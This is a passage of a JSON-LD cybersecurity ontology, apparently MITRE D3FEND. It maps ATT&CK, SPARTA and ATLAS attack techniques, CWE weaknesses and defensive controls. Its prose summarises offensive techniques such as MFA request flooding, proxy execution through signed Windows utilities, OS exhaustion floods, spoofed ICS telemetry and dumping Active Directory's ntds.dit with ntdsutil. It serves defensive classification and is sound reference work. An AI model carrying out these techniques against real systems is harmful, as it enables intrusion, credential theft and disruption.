      "d3f:definition": "Adversaries may impersonate legitimate protocols or web service traffic to disguise command and control activity and thwart analysis efforts. By impersonating legitimate protocols or web services, adversaries can make their command and control traffic blend in with legitimate network traffic.",
      "rdfs:label": "Protocol or Service Impersonation",
      "rdfs:subClassOf": {
        "@id": "d3f:T1001"
      }
    },
    {
      "@id": "d3f:CWE-562",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-562",
      "d3f:definition": "A function returns the address of a stack variable, which will cause unintended program behavior, typically in the form of a crash.",
      "rdfs:label": "Return of Stack Variable Address",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-758"
      }
    },
    {
      "@id": "d3f:TA0001",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to get into your network.\n\nInitial Access consists of techniques that use various entry vectors to gain their initial foothold within a network. Techniques used to gain a foothold include targeted spearphishing and exploiting weaknesses on public-facing web servers. Footholds gained through initial access may allow for continued access, like valid accounts and use of external remote services, or may be limited-use due to changing passwords.",
      "d3f:display-order": 1,
      "rdfs:label": "Initial Access",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:T1636.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1636.001",
      "d3f:definition": "Adversaries may utilize standard operating system APIs to gather calendar entry data. On Android, this can be accomplished using the Calendar Content Provider. On iOS, this can be accomplished using the `EventKit` framework.",
      "rdfs:label": "Calendar Entries - ATTACK Mobile",
      "rdfs:subClassOf": {
        "@id": "d3f:T1636"
      },
      "skos:prefLabel": "Calendar Entries"
    },
    {
      "@id": "d3f:T1059.002",
      "@type": "owl:Class",
      "d3f:attack-id": "T1059.002",
      "d3f:definition": "Adversaries may abuse AppleScript for execution. AppleScript is a macOS scripting language designed to control applications and parts of the OS via inter-application messages called AppleEvents.(Citation: Apple AppleScript) These AppleEvent messages can be sent independently or easily scripted with AppleScript. These events can locate open windows, send keystrokes, and interact with almost any open application locally or remotely.",
      "rdfs:label": "AppleScript",
      "rdfs:subClassOf": {
        "@id": "d3f:T1059"
      }
    },
    {
      "@id": "d3f:Time",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "Time is the one-dimensional continuum of temporal regions within which all processes unfold and at which all continuants exist. A temporal region is a specific portion of this continuum that may be either zero-dimensional (a temporal instant) or one-dimensional (a temporal interval). Temporal regions serve as the temporal boundaries and extents for occurrents (processes, events) and provide the temporal indexing for the existence of continuants (entities that persist through time).",
      "rdfs:label": "Time",
      "rdfs:seeAlso": {
        "@id": "dbr:Time_in_physics"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:D3FENDCore"
      }
    },
    {
      "@id": "d3f:T1621",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:abuses": {
        "@id": "d3f:RemoteAuthenticationService"
      },
      "d3f:attack-id": "T1621",
      "d3f:definition": "Adversaries may attempt to bypass multi-factor authentication (MFA) mechanisms and gain access to accounts by generating MFA requests sent to users.",
      "rdfs:label": "Multi-Factor Authentication Request Generation",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CredentialAccessTechnique"
        },
        {
          "@id": "_:Naf4042a202f84681b76811adb53b6665"
        }
      ]
    },
    {
      "@id": "_:Naf4042a202f84681b76811adb53b6665",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:abuses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:RemoteAuthenticationService"
      }
    },
    {
      "@id": "d3f:ST0008",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SPARTATactic"
      ],
      "d3f:definition": "Threat actor is trying to steal information.",
      "d3f:display-order": 8,
      "rdfs:label": "Exfiltration - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/tactic/ST0008"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OffensiveTactic"
        },
        {
          "@id": "d3f:SPARTATactic"
        }
      ],
      "skos:prefLabel": "Exfiltration"
    },
    {
      "@id": "d3f:AccessControlGroup",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A collection of objects that can have access controls placed on them.",
      "d3f:restricted-by": {
        "@id": "d3f:AccessControlList"
      },
      "rdfs:label": "Access Control Group",
      "rdfs:seeAlso": {
        "@id": "https://schema.ocsf.io/objects/group"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:AccessControlConfiguration"
        },
        {
          "@id": "_:N2c394f1543b14761bdf9f50b40624fc9"
        }
      ]
    },
    {
      "@id": "_:N2c394f1543b14761bdf9f50b40624fc9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:restricted-by"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:AccessControlList"
      }
    },
    {
      "@id": "d3f:ATTACKICSPersistenceTechnique",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:enables": {
        "@id": "d3f:TA0110"
      },
      "rdfs:label": "Persistence Technique - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSTechnique"
        },
        {
          "@id": "_:Ncbc9426b92b946869bddc6ea1b27dccd"
        }
      ],
      "skos:prefLabel": "Persistence Technique"
    },
    {
      "@id": "_:Ncbc9426b92b946869bddc6ea1b27dccd",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:enables"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:TA0110"
      }
    },
    {
      "@id": "d3f:CWE-451",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-451",
      "d3f:definition": "The user interface (UI) does not properly represent critical information to the user, allowing the information - or its source - to be obscured or spoofed. This is often a component in phishing attacks.",
      "rdfs:label": "User Interface (UI) Misrepresentation of Critical Information",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-221"
        },
        {
          "@id": "d3f:CWE-684"
        }
      ]
    },
    {
      "@id": "d3f:PointerDereferencingFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:addresses": [
        {
          "@id": "d3f:MemoryBlock"
        },
        {
          "@id": "d3f:Pointer"
        }
      ],
      "d3f:definition": "A function which has an operation which dereferences a pointer.",
      "rdfs:comment": "Note, this is not the actual code which performs the dereferencing operation internal to an application runtime.",
      "rdfs:label": "Pointer Dereferencing Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Nfad437cd143d477c8d12c9c563ccdafb"
        },
        {
          "@id": "_:N9130a9c379404f31833f762bf978aad1"
        }
      ]
    },
    {
      "@id": "_:Nfad437cd143d477c8d12c9c563ccdafb",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:MemoryBlock"
      }
    },
    {
      "@id": "_:N9130a9c379404f31833f762bf978aad1",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:addresses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Pointer"
      }
    },
    {
      "@id": "d3f:SymbolicLogic",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:d3fend-id": "D3A-SL",
      "d3f:definition": "Symbolic Logic, also known as formal logic, is a branch of mathematics that uses symbolic representations for logical expressions and relationships. It provides a systematic method for examining the structure of arguments and reasoning, focusing on the relationships between propositions rather than the content of those propositions.",
      "d3f:kb-article": "## How it Works\n\n## References\n1. Symbolic Logic. (2023, June 6). In _Wolfram Mathworld_. [Link](https://mathworld.wolfram.com/SymbolicLogic.html)\n2. Hughes, G. and Schagrin, M. (2023, Apr 19). Formal Logic. _Encyclopedia Brittanica_. [Link](https://www.britannica.com/topic/formal-logic)\n3. Carnap, R. (1953). Introduction to Symbolic Logic and Its Applications. Dover Publications. [Link](https://archive.org/details/rudolf-carnap-introduction-to-symbolic-logic-and-its-applications/page/3/mode/2up)",
      "rdfs:label": "Symbolic Logic",
      "rdfs:subClassOf": {
        "@id": "d3f:AnalyticTechnique"
      }
    },
    {
      "@id": "d3f:MemoryDeviceEvent",
      "@type": "owl:Class",
      "d3f:definition": "An event describing activity in primary storage devices, such as DRAM or SRAM memory initialization, reconfiguration, or failures.",
      "rdfs:label": "Memory Device Event",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:HardwareDeviceEvent"
        },
        {
          "@id": "_:Nae6183a6e54545929862fcc99ec55634"
        }
      ]
    },
    {
      "@id": "_:Nae6183a6e54545929862fcc99ec55634",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:has-participant"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:PrimaryStorage"
      }
    },
    {
      "@id": "d3f:Reference-DYNAMICBASE_UseAddressSpaceLayoutRandomization_MicrosoftDocs",
      "@type": [
        "owl:NamedIndividual",
        "d3f:UserManualReference"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=vs-2019"
      },
      "d3f:kb-author": "Microsoft",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "Microsoft",
      "d3f:kb-reference-of": {
        "@id": "d3f:SegmentAddressOffsetRandomization"
      },
      "d3f:kb-reference-title": "/DYNAMICBASE (Use address space layout randomization)",
      "rdfs:label": "Reference - /DYNAMICBASE (Use address space layout randomization) - Microsoft Docs"
    },
    {
      "@id": "d3f:ThreadStartFunction",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "A function which invokes a create thread system call.",
      "d3f:executes": {
        "@id": "d3f:Thread"
      },
      "rdfs:label": "Thread Start Function",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:Subroutine"
        },
        {
          "@id": "_:Ncf3c80711995454e9e23a5195d860148"
        }
      ]
    },
    {
      "@id": "_:Ncf3c80711995454e9e23a5195d860148",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:executes"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Thread"
      }
    },
    {
      "@id": "d3f:LANAccessMediation",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:LANAccessMediation"
      ],
      "d3f:d3fend-id": "D3-LAMED",
      "d3f:definition": "LAN access mediation encompasses the application of strict access control policies, systematic verification of devices, and authentication mechanisms to govern connectivity to a Local Area Network.",
      "d3f:isolates": {
        "@id": "d3f:LocalAreaNetwork"
      },
      "d3f:kb-article": "## How it works\n\nLAN Access Mediation is a network security approach that manages and controls access to a Local Area Network by using key components such as Access Control Lists (ACLs) to specify which devices are allowed or denied access, Port Security to restrict device connections to specific switch ports, RADIUS for determining the level of access or specific resources available to users or devices, and 802.1X for enforcing device authentication before granting network access. This comprehensive strategy ensures that only authorized devices and users can connect to the network, enhancing overall security.",
      "d3f:kb-reference": {
        "@id": "d3f:Reference-WhatIsNetworkAccessControl"
      },
      "rdfs:comment": "Layer 2 Enforcement",
      "rdfs:label": "LAN Access Mediation",
      "rdfs:seeAlso": {
        "@id": "https://dodcio.defense.gov/Portals/0/Documents/Library/(U)ZT_RA_v2.0(U)_Sep22.pdf"
      },
      "rdfs:subClassOf": [
        {
          "@id": "d3f:NetworkAccessMediation"
        },
        {
          "@id": "_:Ndc344869922b455a9fc179c1692937fa"
        }
      ]
    },
    {
      "@id": "_:Ndc344869922b455a9fc179c1692937fa",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:isolates"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:LocalAreaNetwork"
      }
    },
    {
      "@id": "d3f:ComputingSnapshot",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer systems, a snapshot is the state of a system at a particular point in time.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/resource/Snapshot_(computer_storage)"
      },
      "rdfs:label": "Computing Snapshot",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      },
      "skos:altLabel": "Snapshot"
    },
    {
      "@id": "d3f:M1037",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseMitigation"
      ],
      "d3f:related": {
        "@id": "d3f:NetworkIsolation"
      },
      "rdfs:label": "Filter Network Traffic"
    },
    {
      "@id": "d3f:REC-0005.03",
      "@type": "owl:Class",
      "d3f:attack-id": "REC-0005.03",
      "d3f:definition": "In proximity scenarios, an adversary platform (or co-located payload) attempts to observe emissions and intra-vehicle traffic at close range, RF side-channels, optical/lasercom leakage, and, in extreme cases, electromagnetic emanations consistent with TEMPEST/EMSEC concerns. Physical proximity can expose harmonics, intermodulation products, local oscillators, and bus activity that are undetectable from the ground, enabling reconstruction of timing, command acceptance windows, or even limited protocol content. In hosted-payload or rideshare contexts, a poorly segregated data path may permit passive observation of TT&C gateways, crosslinks, or payload buses.",
      "rdfs:label": "Proximity Operations - SPARTA",
      "rdfs:seeAlso": {
        "@id": "https://sparta.aerospace.org/technique/REC-0005/03/"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:REC-0005"
      },
      "skos:prefLabel": "Proximity Operations"
    },
    {
      "@id": "d3f:Record",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "In computer science, a record (also called struct or compound data) is a basic data structure. A record is a collection of fields, possibly of different data types, typically in fixed number and sequence . The fields of a record may also be called members, particularly in object-oriented programming. Fields may also be called elements, though these risk confusion with the elements of a collection. A tuple may or may not be considered a record, and vice versa, depending on conventions and the specific programming language.",
      "rdfs:isDefinedBy": {
        "@id": "dbr:Record_(computer_science)"
      },
      "rdfs:label": "Record",
      "rdfs:subClassOf": {
        "@id": "d3f:DigitalInformationBearer"
      }
    },
    {
      "@id": "d3f:has-procedure",
      "@type": "owl:ObjectProperty",
      "rdfs:label": "has-procedure",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-general-object-property"
      }
    },
    {
      "@id": "d3f:RubyScriptFile",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExecutableScript"
      ],
      "rdfs:label": "Ruby Script File"
    },
    {
      "@id": "d3f:ATTACKICSThing",
      "@type": "owl:Class",
      "rdfs:label": "ATTACK ICS Thing",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKThing"
      }
    },
    {
      "@id": "d3f:SystemDaemonMonitoring",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:SystemDaemonMonitoring"
      ],
      "d3f:d3fend-id": "D3-SDM",
      "d3f:definition": "Tracking changes to the state or configuration of critical system level processes.",
      "d3f:kb-article": "## How it works\nAttackers may manipulate system settings or services to disable system logging or monitoring of security tools and events. Firewall and antivirus services are popular targets for attackers. Disabling system logs will also allow an attacker's actions to go unnoticed. Analysis of logs, registries, and process monitoring help defenders locate signs of tampering. Two possible approaches are to monitor hardened system services or to monitor registry updates for modifications to security settings.",
      "d3f:kb-reference": [
        {
          "@id": "d3f:Reference-HostIntrusionPreventionSystemUsingSoftwareAndUserBehaviorAnalysis_SophosLtd"
        },
        {
          "@id": "d3f:Reference-MethodUsingKernelModeAssistanceForTheDetectionAndRemovalOfThreatsWhichAreActivelyPreventingDetectionAndRemovalFromARunningSystem_SymantecCorporation"
        },
        {
          "@id": "d3f:Reference-UserActivityFromStoppingWindowsDefensiveServices_MITRE"
        }
      ],
      "d3f:monitors": {
        "@id": "d3f:OperatingSystemProcess"
      },
      "rdfs:label": "System Daemon Monitoring",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:OperatingSystemMonitoring"
        },
        {
          "@id": "_:Nf53a78f381224df0833f94f64cee39d9"
        }
      ]
    },
    {
      "@id": "_:Nf53a78f381224df0833f94f64cee39d9",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:monitors"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:OperatingSystemProcess"
      }
    },
    {
      "@id": "d3f:CWE-238",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-238",
      "d3f:definition": "The product does not handle or incorrectly handles when a particular structural element is not completely specified.",
      "rdfs:label": "Improper Handling of Incomplete Structural Elements",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-237"
      }
    },
    {
      "@id": "d3f:CWE-90",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-90",
      "d3f:definition": "The product constructs all or part of an LDAP query using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended LDAP query when it is sent to a downstream component.",
      "rdfs:label": "Improper Neutralization of Special Elements used in an LDAP Query ('LDAP Injection')",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-943"
      }
    },
    {
      "@id": "d3f:T1218.009",
      "@type": "owl:Class",
      "d3f:attack-id": "T1218.009",
      "d3f:definition": "Adversaries may abuse Regsvcs and Regasm to proxy execution of code through a trusted Windows utility. Regsvcs and Regasm are Windows command-line utilities that are used to register .NET [Component Object Model](https://attack.mitre.org/techniques/T1559/001) (COM) assemblies. Both are binaries that may be digitally signed by Microsoft. (Citation: MSDN Regsvcs) (Citation: MSDN Regasm)",
      "rdfs:label": "Regsvcs/Regasm",
      "rdfs:subClassOf": {
        "@id": "d3f:T1218"
      }
    },
    {
      "@id": "d3f:CWE-651",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-651",
      "d3f:definition": "The Web services architecture may require exposing a Web Service Definition Language (WSDL) file that contains information on the publicly accessible services and how callers of these services should interact with them (e.g. what parameters they expect and what types they return).",
      "rdfs:label": "Exposure of WSDL File Containing Sensitive Information",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-538"
      }
    },
    {
      "@id": "d3f:CWE-1220",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1220",
      "d3f:definition": "The product implements access controls via a policy or other feature with the intention to disable or restrict accesses (reads and/or writes) to assets in a system from untrusted agents. However, implemented access controls lack required granularity, which renders the control policy too broad because it allows accesses from unauthorized agents to the security-sensitive assets.",
      "rdfs:label": "Insufficient Granularity of Access Control",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-284"
      }
    },
    {
      "@id": "d3f:DS0016",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "A non-volatile data storage device (hard drive, floppy disk, USB flash drive) with at least one formatted partition, typically mounted to the file system and/or assigned a drive letter",
      "rdfs:comment": "This data source captures events relating to drives and therefore has no direct mappings to digital artifacts.",
      "rdfs:label": "Drive (ATT&CK DS)"
    },
    {
      "@id": "d3f:deceives-with",
      "@type": "owl:ObjectProperty",
      "d3f:definition": "x deceives-with y: The entity x misleads or manipulates another entity using y as a tool, method, or mechanism to create false perceptions or understanding.",
      "rdfs:label": "deceives-with",
      "rdfs:subPropertyOf": {
        "@id": "d3f:d3fend-tactical-verb-property"
      }
    },
    {
      "@id": "d3f:TA0043",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual",
        "d3f:OffensiveTactic"
      ],
      "d3f:definition": "The adversary is trying to gather information they can use to plan future operations.\n\nReconnaissance consists of techniques that involve adversaries actively or passively gathering information that can be used to support targeting. Such information may include details of the victim organization, infrastructure, or staff/personnel. This information can be leveraged by the adversary to aid in other phases of the adversary lifecycle, such as using gathered information to plan and execute Initial Access, to scope and prioritize post-compromise objectives, or to drive and lead further Reconnaissance efforts.",
      "d3f:display-order": -1,
      "rdfs:label": "Reconnaissance",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKEnterpriseTactic"
        },
        {
          "@id": "d3f:OffensiveTactic"
        }
      ]
    },
    {
      "@id": "d3f:DigitalCamera",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:definition": "An optical instrument that can capture an image. A digital camera that captures photographs in digital memory.",
      "rdfs:isDefinedBy": {
        "@id": "https://dbpedia.org/page/Digital_camera"
      },
      "rdfs:label": "Digital Camera",
      "rdfs:subClassOf": {
        "@id": "d3f:HardwareDevice"
      }
    },
    {
      "@id": "d3f:T0841",
      "@type": "owl:Class",
      "d3f:attack-id": "T0841",
      "d3f:definition": "Network Service Scanning is the process of discovering services on networked systems.  This can be achieved through a technique called port scanning or probing.  Port scanning interacts with the TCP/IP ports on a target system to determine whether ports are open, closed, or filtered by a firewall.  This does not reveal the service that is running behind the port, but since many common services are run on [https://www.iana.org/assignments/service-names-port-numbers/service-names-port-numbers.xhtml specific port numbers], the type of service can be assumed.  More in-depth testing includes interaction with the actual service to determine the service type and specific version.  One of the most-popular tools to use for Network Service Scanning is [https://nmap.org/ Nmap].",
      "owl:deprecated": true,
      "rdfs:comment": "This technique has been deprecated.",
      "rdfs:label": "Network Service Scanning - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSDiscoveryTechnique"
      },
      "skos:prefLabel": "Network Service Scanning"
    },
    {
      "@id": "d3f:DS0035",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ATTACKEnterpriseDataSource"
      ],
      "d3f:definition": "Information obtained (commonly via active network traffic probes or web crawling) regarding various types of resources and servers connected to the public Internet",
      "rdfs:comment": "This data source currently has no mappings to digital artifacts.",
      "rdfs:label": "Internet Scan (ATT&CK DS)"
    },
    {
      "@id": "d3f:CWE-694",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-694",
      "d3f:definition": "The product uses multiple resources that can have the same identifier, in a context in which unique identifiers are required.",
      "rdfs:label": "Use of Multiple Resources with Duplicate Identifier",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-573"
        },
        {
          "@id": "d3f:CWE-99"
        }
      ]
    },
    {
      "@id": "d3f:T1499.001",
      "@type": "owl:Class",
      "d3f:attack-id": "T1499.001",
      "d3f:definition": "Adversaries may launch a denial of service (DoS) attack targeting an endpoint's operating system (OS). A system's OS is responsible for managing the finite resources as well as preventing the entire system from being overwhelmed by excessive demands on its capacity. These attacks do not need to exhaust the actual resources on a system; the attacks may simply exhaust the limits and available resources that an OS self-imposes.",
      "rdfs:label": "OS Exhaustion Flood",
      "rdfs:subClassOf": {
        "@id": "d3f:T1499"
      }
    },
    {
      "@id": "d3f:AML.T0004",
      "@type": "owl:Class",
      "d3f:attack-id": "AML.T0004",
      "d3f:definition": "Adversaries may search open application repositories during targeting.\nExamples of these include Google Play, the iOS App store, the macOS App Store, and the Microsoft Store.\n\nAdversaries may craft search queries seeking applications that contain AI-enabled components.\nFrequently, the next step is to [Acquire Public AI Artifacts](/techniques/AML.T0002).",
      "rdfs:label": "Search Application Repositories - ATLAS",
      "rdfs:seeAlso": {
        "@id": "https://atlas.mitre.org/techniques/AML.T0004"
      },
      "rdfs:subClassOf": {
        "@id": "d3f:ATLASReconnaissanceTechnique"
      },
      "skos:prefLabel": "Search Application Repositories"
    },
    {
      "@id": "d3f:CWE-1351",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-1351",
      "d3f:definition": "A hardware device, or the firmware running on it, is missing or has incorrect protection features to maintain goals of security primitives when the device is cooled below standard operating temperatures.",
      "rdfs:label": "Improper Handling of Hardware Behavior in Exceptionally Cold Environments",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-1384"
      }
    },
    {
      "@id": "d3f:CCI-002218_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system provides access from a single device to computing platforms, applications, or data residing on multiple different security domains, while preventing any information flow between the different security domains.",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:narrower": {
        "@id": "d3f:DomainTrustPolicy"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2013-06-24T00:00:00"
      },
      "rdfs:label": "CCI-002218"
    },
    {
      "@id": "d3f:T1659",
      "@type": "owl:Class",
      "d3f:attack-id": "T1659",
      "d3f:definition": "Adversaries may gain access and continuously communicate with victims by injecting malicious content into systems through online network traffic. Rather than luring victims to malicious payloads hosted on a compromised website (i.e., [Drive-by Target](https://attack.mitre.org/techniques/T1608/004) followed by [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)), adversaries may initially access victims through compromised data-transfer channels where they can manipulate traffic and/or inject their own content. These compromised online network channels may also be used to deliver additional payloads (i.e., [Ingress Tool Transfer](https://attack.mitre.org/techniques/T1105)) and other data to already compromised systems.(Citation: ESET MoustachedBouncer)",
      "rdfs:label": "Content Injection",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CommandAndControlTechnique"
        },
        {
          "@id": "d3f:InitialAccessTechnique"
        }
      ]
    },
    {
      "@id": "d3f:CWE-862",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-862",
      "d3f:definition": "The product does not perform an authorization check when an actor attempts to access a resource or perform an action.",
      "d3f:synonym": "AuthZ",
      "rdfs:comment": "Broad and could apply to all resource accesses.",
      "rdfs:label": "Missing Authorization",
      "rdfs:subClassOf": {
        "@id": "d3f:CWE-285"
      }
    },
    {
      "@id": "d3f:CWE-126",
      "@type": "owl:Class",
      "d3f:cwe-id": "CWE-126",
      "d3f:definition": "The product reads from a buffer using buffer access mechanisms such as indexes or pointers that reference memory locations after the targeted buffer.",
      "rdfs:label": "Buffer Over-read",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:CWE-125"
        },
        {
          "@id": "d3f:CWE-788"
        }
      ]
    },
    {
      "@id": "d3f:CCI-000804_v2022-04-05",
      "@type": [
        "owl:NamedIndividual",
        "d3f:CCIControl"
      ],
      "d3f:broader": [
        {
          "@id": "d3f:BiometricAuthentication"
        },
        {
          "@id": "d3f:Certificate-basedAuthentication"
        },
        {
          "@id": "d3f:Multi-factorAuthentication"
        },
        {
          "@id": "d3f:One-timePassword"
        }
      ],
      "d3f:contributor": {
        "@id": "d3f:DISA_FSO"
      },
      "d3f:definition": "The information system uniquely identifies and authenticates non-organizational users (or processes acting on behalf of non-organizational users).",
      "d3f:member-of": {
        "@id": "d3f:CCICatalog_v2022-04-05"
      },
      "d3f:published": {
        "@type": "xsd:dateTime",
        "@value": "2009-09-17T00:00:00"
      },
      "rdfs:label": "CCI-000804"
    },
    {
      "@id": "d3f:T0856",
      "@type": "owl:Class",
      "d3f:attack-id": "T0856",
      "d3f:definition": "Adversaries may spoof reporting messages in control system environments for evasion and to impair process control. In control systems, reporting messages contain telemetry data (e.g., I/O values) pertaining to the current state of equipment and the industrial process. Reporting messages are important for monitoring the normal operation of a system or identifying important events such as deviations from expected values.",
      "rdfs:label": "Spoof Reporting Message - ATTACK ICS",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:ATTACKICSEvasionTechnique"
        },
        {
          "@id": "d3f:ATTACKICSImpairProcessControlTechnique"
        }
      ],
      "skos:prefLabel": "Spoof Reporting Message"
    },
    {
      "@id": "d3f:T0803",
      "@type": "owl:Class",
      "d3f:attack-id": "T0803",
      "d3f:definition": "Adversaries may block a command message from reaching its intended target to prevent command execution. In OT networks, command messages are sent to provide instructions to control system devices. A blocked command message can inhibit response functions from correcting a disruption or unsafe condition. (Citation: Bonnie Zhu, Anthony Joseph, Shankar Sastry 2011)  (Citation: Electricity Information Sharing and Analysis Center; SANS Industrial Control Systems March 2016)",
      "rdfs:label": "Block Command Message - ATTACK ICS",
      "rdfs:subClassOf": {
        "@id": "d3f:ATTACKICSInhibitResponseFunctionTechnique"
      },
      "skos:prefLabel": "Block Command Message"
    },
    {
      "@id": "d3f:Reference-ActiveDirectoryDumpingViaNTDSUtil_MITRE",
      "@type": [
        "owl:NamedIndividual",
        "d3f:ExternalKnowledgeBase"
      ],
      "d3f:has-link": {
        "@type": "xsd:anyURI",
        "@value": "https://car.mitre.org/analytics/CAR-2019-08-002/"
      },
      "d3f:kb-abstract": "The NTDSUtil tool may be used to dump a Microsoft Active Directory database to disk for processing with a credential access tool such as Mimikatz. This is performed by launching ntdsutil.exe as a privileged user with command line arguments indicating that media should be created for offline Active Directory installation and specifying a folder path. This process will create a copy of the Active Directory database, ntds.dit, to the specified folder path.",
      "d3f:kb-author": "MITRE",
      "d3f:kb-mitre-analysis": "",
      "d3f:kb-organization": "MITRE",
      "d3f:kb-reference-of": {
        "@id": "d3f:ProcessSpawnAnalysis"
      },
      "d3f:kb-reference-title": "CAR-2019-08-002: Active Directory Dumping via NTDSUtil",
      "rdfs:label": "Reference - CAR-2019-08-002: Active Directory Dumping via NTDSUtil - MITRE"
    },
    {
      "@id": "d3f:T1083",
      "@type": [
        "owl:Class",
        "owl:NamedIndividual"
      ],
      "d3f:accesses": [
        {
          "@id": "d3f:Directory"
        },
        {
          "@id": "d3f:File"
        }
      ],
      "d3f:attack-id": "T1083",
      "d3f:definition": "Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from [File and Directory Discovery](https://attack.mitre.org/techniques/T1083) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.",
      "rdfs:label": "File and Directory Discovery",
      "rdfs:subClassOf": [
        {
          "@id": "d3f:DiscoveryTechnique"
        },
        {
          "@id": "_:Nedc0a4720be146cf8c09417eabdd51b3"
        },
        {
          "@id": "_:Nc43a3e69df42480ba80bd94a2ae49f34"
        }
      ]
    },
    {
      "@id": "_:Nedc0a4720be146cf8c09417eabdd51b3",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
      "owl:someValuesFrom": {
        "@id": "d3f:Directory"
      }
    },
    {
      "@id": "_:Nc43a3e69df42480ba80bd94a2ae49f34",
      "@type": "owl:Restriction",
      "owl:onProperty": {
        "@id": "d3f:accesses"
      },
